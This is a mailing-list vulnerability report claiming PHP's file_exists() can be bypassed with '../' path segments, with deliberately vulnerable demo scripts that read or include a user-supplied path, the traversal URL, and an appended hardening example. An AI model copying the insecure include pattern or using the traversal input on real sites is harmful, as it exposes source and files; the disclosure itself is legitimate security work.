Hi,
There is a security problem in the file_exists() function which allows
unauthorized users to bypass the function.
For example, a user uses this function to check the existence of his file
"my_file.php" in the "/test" directory and to display its source code.
He uses a script like this one for this:
----- file_exists.php -----
<?php
if (file_exists($var)) { // $var is taken from the ?var= request parameter
    echo("File exist<br><br>");
    $source = file($var);
    while (list($num_line, $line) = each($source))
    {
        echo "<B>Line $num_line:</B> " . htmlspecialchars($line) . "<br>";
    }
} else {
    echo("File doesn't exist<br><br>");
    $source = file($var); // the file is read even though the check failed
    while (list($num_line, $line) = each($source))
    {
        echo "<B>Line $num_line:</B> " . htmlspecialchars($line) . "<br>";
    }
}
?>
----- file_exists.php -----
He tests his script with the following address on his server:
http://[server]/test/file_exists.php?var=my_file.php
The file "my_file.php" contains the following text:
----- my_file.php -----
PHP is a widely-used
general-purpose scripting
language that is especially
suited for Web development
and can be embedded into HTML.
----- my_file.php -----
After launching his script, he obtains:
File exist
Line 0: PHP is a widely-used
Line 1: general-purpose scripting
Line 2: language that is especially
Line 3: suited for Web development
Line 4: and can be embedded into HTML.
Up to here everything seems to be normal.
If he tests it with another file name, he obtains:
File doesn't exist
Warning: file(test): failed to open stream: No such file or directory in
/home/xxx/www/test/file_exists.php on line 11
Warning: Variable passed to each() is not an array or object in
/home/xxx/www/test/file_exists.php on line 12
It's normal too...
But if a user tests this script, for example with the following link:
http://[server]/test/file_exists.php?var=anything/../my_file.php
he obtains:
File doesn't exist
Line 0: PHP is a widely-used
Line 1: general-purpose scripting
Line 2: language that is especially
Line 3: suited for Web development
Line 4: and can be embedded into HTML.
We can see that the file_exists() function returns that the file doesn't
exist, but the source code has been displayed.
It's a very critical bug because a malicious user can use it to bypass
the file_exists() protection on an include() script, for example.
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Another, simpler example:
In the same directory:
test.php
-----------------------------------------------------------
<?
if(file_exists($page)){
echo("Sorry the local page is protected");
}else{
include($page);
}
?>
-----------------------------------------------------------
file.txt
-----------------------------------------------------------
Hello Word
-----------------------------------------------------------
Result:
Sorry the local page is protected
Result:
Hello Word
The file_exists() function is bypassed.
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
I want to know if you think that's a real vulnerability or not? (securityfocus says NO and doesn't want to publish it)
If you have any questions, don't hesitate to contact me.
Nourredine Himeur
[EMAIL PROTECTED]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
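A defensive pattern for the two scripts above, as an added example that is not part of the original post: resolve the requested name once with realpath(), accept it only if it is a regular file under the intended directory, and then read that same resolved path, so the existence check and the file access cannot disagree. The function names and the temporary directory are hypothetical, and the code is written for current PHP rather than the PHP version used in the post.

```php
<?php
declare(strict_types=1);

// Return the canonical path of $name if it is a regular file under $baseDir, else null.
function resolve_inside(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($name, "\0") !== false) {
        return null;
    }
    $real = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($real === false || !is_file($real)) {
        return null; // fail closed: unresolved names are never opened
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Render a file as numbered, HTML-escaped lines, reading only the resolved path.
function render_source(string $baseDir, string $name): string
{
    $path = resolve_inside($baseDir, $name);
    $lines = $path === null ? false : file($path, FILE_IGNORE_NEW_LINES);
    if ($lines === false) {
        return "File not available<br><br>\n";
    }
    $out = "File exists<br><br>\n";
    foreach ($lines as $num => $line) {
        $out .= "<b>Line $num:</b> " . htmlspecialchars($line) . "<br>\n";
    }
    return $out;
}

// Constructed sample data: a temporary directory standing in for /test.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fe_demo_' . getmypid();
mkdir($root . '/test', 0700, true);
file_put_contents($root . '/test/my_file.php', "PHP is a widely-used\ngeneral-purpose scripting\n");
file_put_contents($root . '/outside.txt', "not for display\n");

foreach (['my_file.php', 'anything/../my_file.php', '../outside.txt', 'missing.php'] as $var) {
    echo "var=$var\n", render_source($root . '/test', $var), "\n";
}

// Remove the constructed files again.
unlink($root . '/test/my_file.php');
unlink($root . '/outside.txt');
rmdir($root . '/test');
rmdir($root);
```

For the include() case in test.php, the same resolved path returned by resolve_inside() would be the only value ever passed to include().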